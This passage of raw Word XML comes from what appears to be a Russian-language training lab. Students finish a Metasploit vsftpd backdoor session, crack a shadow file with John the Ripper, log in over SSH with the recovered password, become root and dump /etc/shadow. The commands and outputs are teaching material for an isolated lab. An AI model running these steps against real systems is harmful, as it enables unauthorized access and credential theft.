    </w:p>
    <w:p w14:paraId="5264D9E1" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02075C2B" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="008B5392">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F677F69" w14:textId="5A0F342D" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="008B5392">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[*] 209.165.200.235 - Command shell session</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">closed.  Reason: Died from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EOFError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="708FDC46" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="008B5392">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A026762" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="0017192E" w:rsidRDefault="00A258CE" w:rsidP="008B5392">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(vsftpd_234_backdoor) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7D045A" w14:textId="09BA6443" w:rsidR="00357A25" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Нажмите клавишу Enter</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">введите </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>quit</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы закрыть консоль среды Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731CD8D8" w14:textId="77777777" w:rsidR="00EC36FD" w:rsidRDefault="006A6583" w:rsidP="00B12758">
      <w:pPr>
        <w:pStyle w:val="PartHead"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Проникновение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760AEC0A" w14:textId="1ED18A2E" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="StepHead"/>
      </w:pPr>
      <w:r>
        <w:t>Взлом паролей</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>помощью утилиты John the Ripper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0E35EB" w14:textId="78E1CB65" w:rsidR="00A258CE" w:rsidRPr="00EE2B0C" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>John the Ripper — это инструмент, используемый для поиска слабых паролей пользователей. На этом этапе вы будете использовать утилиту John the Ripper, чтобы взломать ненадежные пароли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68373CA1" w14:textId="45623DFE" w:rsidR="00A258CE" w:rsidRPr="00EE2B0C" w:rsidRDefault="00E60D5A" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>В командной строке ВМ Kali</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>правами root убедитесь, что файл shadow находится</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">папке </w:t>
      </w:r>
      <w:r w:rsidR="00A258CE" w:rsidRPr="00E60D5A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> этой ВМ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FDEA0B" w14:textId="26830407" w:rsidR="00A258CE" w:rsidRPr="00EE2B0C" w:rsidRDefault="00A258CE" w:rsidP="00875021">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В командной строке root Kali ВМ введите команду </w:t>
      </w:r>
      <w:r w:rsidRPr="00E60D5A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>john</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, чтобы начать взлом паролей. Используйте параметр </w:t>
      </w:r>
      <w:r w:rsidRPr="00E60D5A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">show </w:t>
      </w:r>
      <w:r>
        <w:t>для удобства просмотра взломанных паролей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D651F0" w14:textId="5F5F705A" w:rsidR="00E60D5A" w:rsidRPr="00E60D5A" w:rsidRDefault="00E60D5A" w:rsidP="00E60D5A">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Пароль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cyberops</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> добавлен</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/usr/share/john/password.lst</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы ускорить процесс взлома паролей.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D08A281" w14:textId="1F5F5F57" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE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root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:~# </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">john --show /root/shadow.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536C202D" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>analyst:cyberops</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:17338:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761B2FA4" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BFFA9DB" w14:textId="5CE9C302" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00B35DD1" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1 password hash cracked,</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7" w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r w:rsidR="0042041D">
        <w:rPr>
          <w:rFonts w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A258CE" w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>left</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045E0B9A" w14:textId="62AF8E86" w:rsidR="00C66DAF" w:rsidRDefault="00C66DAF" w:rsidP="00F6569C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После взлома пароля для пользователя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>analyst</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вы можете получить доступ</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>Metasploitable по протоколу SSH</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">помощью имени пользователя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>analyst</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FB8A24" w14:textId="1AFAE6C6" w:rsidR="001F195B" w:rsidRPr="00500A49" w:rsidRDefault="001F195B" w:rsidP="00F6569C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F195B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26740B87" wp14:editId="4CEB0C77">
            <wp:extent cx="5867400" cy="356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56AF" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="StepHead"/>
      </w:pPr>
      <w:r>
        <w:t>Найдите целевой узел.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AB40DB" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="001F195B" w:rsidRDefault="00A258CE" w:rsidP="00A258CE">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>На этом этапе вы будете использовать различные команды для поиска IP-адреса возможного узла во внутренней сети за зоной DMZ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE3DDC2" w14:textId="7833EAC3" w:rsidR="00A258CE" w:rsidRDefault="00E60D5A" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
        <w:spacing w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Установите сеанс по SSH</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">виртуальной машиной Metasploitable. </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Hlk491157364"/>
      <w:r>
        <w:t xml:space="preserve">Введите </w:t>
      </w:r>
      <w:r w:rsidR="00A258CE" w:rsidRPr="00F27B94">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (да), чтобы принять цифровую подпись RSA при первом подключении.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t xml:space="preserve"> Подключение может занять некоторое время. Введите </w:t>
      </w:r>
      <w:r w:rsidR="00A258CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cyberops</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>ответ на запрос пароля.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF5143" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="001F195B" w:rsidRDefault="00A258CE" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F195B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F195B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F195B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F195B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F195B">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F195B">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> analyst@209.165.200.235</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D65DB" w14:textId="2388DA71" w:rsidR="00A258CE" w:rsidRPr="001F195B" w:rsidRDefault="00A258CE" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F195B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">analyst@209.165.200.235's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F035A6" w14:textId="25255FD3" w:rsidR="008F5730" w:rsidRDefault="008F5730" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Убедитесь, что</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> у </w:t>
      </w:r>
      <w:r>
        <w:t>вас есть доступ</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>правами root. Введите</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">командной строке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>su -l myroot</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> В </w:t>
      </w:r>
      <w:r>
        <w:t>параметре нужно использовать строчную букву L,</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> а </w:t>
      </w:r>
      <w:r>
        <w:t>не цифру 1. Обратите внимание, что командная строка изменилась</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>analyst@metasploitable на root@metasploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792EE75D" w14:textId="520CAD86" w:rsidR="008F5730" w:rsidRPr="008855F4" w:rsidRDefault="008F5730" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>analyst@metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">su -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>myroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B69DD3F" w14:textId="75A559F0" w:rsidR="008F5730" w:rsidRPr="008855F4" w:rsidRDefault="008F5730" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>root@metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:~#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBBA72A" w14:textId="368B8E8B" w:rsidR="00DB06C7" w:rsidRDefault="00DB06C7" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Отображает файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8472F" w14:textId="32F56045" w:rsidR="00DB06C7" w:rsidRDefault="00DB06C7" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:~# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ca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hadow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A7B10FC" w14:textId="29860B98" w:rsidR="00500A49" w:rsidRDefault="00500A49" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00500A49">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1677A1DC" wp14:editId="29D834CD">
            <wp:extent cx="6400800" cy="27108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62AA" w14:textId="09E15277" w:rsidR="00CE1E3F" w:rsidRDefault="00CE1E3F" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Введите</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">командной строке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы вернуться</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">правам доступа пользователя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>analyst</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2970598B" w14:textId="65160CC5" w:rsidR="00CA61AD" w:rsidRDefault="00CA61AD" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Теперь выведите на экран файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от имени пользователя analyst.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F4DF13" w14:textId="5054CC86" w:rsidR="00CA61AD" w:rsidRDefault="00CA61AD" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>analyst@metasploitable:~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60370AD1" w14:textId="25F15B88" w:rsidR="00CA61AD" w:rsidRDefault="00CA61AD" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:keepNext/>
        <w:spacing w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Почему вы получили сообщение об ошибке? Запишите это сообщение</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>объясните его.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68208EFA" w14:textId="4419EF93" w:rsidR="00A767DB" w:rsidRPr="00A767DB" w:rsidRDefault="00981055" w:rsidP="00A767DB">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00981055">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Файл </w:t>
      </w:r>
      <w:r w:rsidRPr="00981055">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00981055">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shadow</w:t>
      </w:r>
      <w:r w:rsidRPr="00981055">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">доступен только </w:t>
      </w:r>
      <w:r w:rsidR="00A767DB">
        <w:t xml:space="preserve">от </w:t>
      </w:r>
      <w:r w:rsidR="00A767DB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B597FB0" w14:textId="601313EC" w:rsidR="00A258CE" w:rsidRDefault="00A258CE" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Введите </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, чтобы вывести на экран список всех сетевых интерфейсов на Metasploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438469D0" w14:textId="77777777" w:rsidR="00A258CE" w:rsidRPr="008855F4" w:rsidRDefault="00A258CE" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:spacing w:line="238" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>analyst@metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="041C1FA0" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4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 xml:space="preserve">eth0      Link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encap:Ethernet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HWaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 08:00:27:ab:84:07  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F5ECB4" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4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 xml:space="preserve">          </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> addr:209.165.200.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
